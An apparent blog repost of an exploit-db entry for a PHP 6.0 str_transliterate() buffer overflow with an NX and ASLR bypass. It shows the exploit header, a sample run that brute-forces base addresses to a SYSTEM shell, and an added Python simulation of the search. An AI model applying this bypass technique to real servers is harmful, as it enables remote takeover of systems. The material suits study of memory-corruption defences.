Archive

Posts tagged 'ASLR Bypass'

PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass

April 14, 2010, by admin. 1,864 views. No comments.

Source: exploit-db.com

# Title: PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
# EDB-ID: 12189
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Matteo Memelli
# Published: 2010-04-13
# Verified: yes

<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)

Thx to muts and Elwood for helping ;)

Bruteforce script is attached in base64 format.

root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address…
(+) Trying base address 0x78000000
(+) Trying base address 0x77000000
(+) Trying base address 0x76000000
(+) Trying base address 0x75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation.  All rights reserved.

C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
Read more…
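The sample run above shows the shape of the ASLR bypass: the module that hosts the WriteProcessMemory return address has a randomized base, but the offset of that address inside the image is fixed, so the script only has to guess the base, one candidate per request, until the worker returns a shell instead of crashing. The following Python is an added model of that search written for this page; it is not ryujin's brute_php6.py and it does not touch PHP. The target is a constructed simulator, and CANDIDATE_BASES (0x78000000 downward in the 16 MB steps the sample run prints), WPM_RVA and RET_OFFSET are hypothetical values chosen for the illustration.

```python
import random
import struct

# Candidate image bases in the order the page's sample run tries them
# (0x78000000 downward in 0x01000000 steps). The lower bound is an assumption.
CANDIDATE_BASES = [0x78000000 - i * 0x01000000 for i in range(8)]

# Hypothetical RVA of the WriteProcessMemory call target inside the module.
# ASLR randomizes where the image is mapped, not the layout inside it, so
# this part of the address is constant and only the base has to be guessed.
WPM_RVA = 0x0001CB6E

# Hypothetical distance from the start of the overflowing string to the saved
# return address on the stack.
RET_OFFSET = 1024


def candidate_wpm_addresses(bases=CANDIDATE_BASES, rva=WPM_RVA):
    """Yield (base, absolute address) pairs in brute-force order."""
    for base in bases:
        yield base, base + rva


def build_payload(ret_addr, ret_offset=RET_OFFSET):
    """Filler up to the saved return address, then the candidate (little-endian)."""
    return b"A" * ret_offset + struct.pack("<I", ret_addr)


class SimulatedTarget:
    """Constructed stand-in for the vulnerable Apache/PHP worker.

    The base is picked once, because Windows randomizes DLL bases per boot
    rather than per process; a failed probe only crashes the worker, which
    is respawned with the same base, so the next guess can be tried.
    """

    def __init__(self, rng, ret_offset=RET_OFFSET):
        self.base = rng.choice(CANDIDATE_BASES)
        self.ret_offset = ret_offset
        self.crashes = 0

    def probe(self, payload):
        """True when the overwritten return address lands on WriteProcessMemory."""
        ret = struct.unpack_from("<I", payload, self.ret_offset)[0]
        if ret == self.base + WPM_RVA:
            return True
        self.crashes += 1  # wrong guess: worker dies, Apache respawns it
        return False


def brute_force(target):
    """Try each candidate until the target 'returns a shell'; give back the base found."""
    for base, addr in candidate_wpm_addresses():
        print("(+) Trying base address 0x%08x" % base)
        if target.probe(build_payload(addr, target.ret_offset)):
            return base
    return None


def run_search(seed):
    """Seeded end-to-end run: returns (base found, true base, crashes on the way)."""
    target = SimulatedTarget(random.Random(seed))
    return brute_force(target), target.base, target.crashes


if __name__ == "__main__":
    found, true_base, crashes = run_search(2010)
    print("(+) module base 0x%08x found after %d crashed workers" % (found, crashes))
```

Two things the model makes explicit that the log only implies. First, the search is only feasible because a wrong guess costs a single worker process, not the service: on a forking or multi-worker server the crashed child is replaced and the base does not change, so every attempt probes the same layout. Second, the 16 MB stepping and the candidate range are taken from the sample output and are assumptions here; the granularity and range a real target uses have to be measured on that system rather than copied from this run.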